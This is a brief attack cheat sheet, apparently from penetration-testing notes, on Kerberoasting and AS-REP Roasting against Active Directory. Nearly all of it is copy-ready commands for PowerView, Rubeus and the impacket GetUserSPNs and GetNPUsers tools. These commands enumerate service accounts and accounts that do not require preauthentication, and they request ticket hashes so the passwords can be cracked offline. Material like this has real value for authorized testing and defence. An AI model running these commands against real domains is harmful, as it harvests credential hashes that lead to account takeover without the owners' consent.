Kerberos Attacks
Kerberoasting
Kerberoasting is an attack against service accounts that allows an attacker to perform an offline password-cracking attack against the Active Directory account associated with the service. We need a valid domain user account and password.
Vulnerability detection
PowerView
Import-Module .\PowerView.ps1
Get-DomainUser -SPN
Windows
PowerView
Import-Module .\PowerView.ps1
Invoke-Kerberoast
Rubeus
.\Rubeus.exe kerberoast /nowrap
Linux
impacket-GetUserSPNs -target-domain domain.local -usersfile users.txt -dc-ip dc01.domain.local domain.local/guest -no-pass
AS-REP Roasting
Do not require Kerberos preauthentication
Windows
- PowerView Manual
Get-ADUser -filter * -properties DoesNotRequirePreAuth | where {$_.DoesNotRequirePreAuth -eq "True" -and $_.Enabled -eq "True"} | select Name
- PowerView Auto
Import-Module .\PowerView.ps1
Get-DomainUser -UACFilter DONT_REQ_PREAUTH
- Rubeus
.\Rubeus.exe asreproast /user:full.name /domain:domain.local /dc:dc01.domain.local
Linux
impacket-GetNPUsers domain.local/ -no-pass -request -k -usersfile users.txt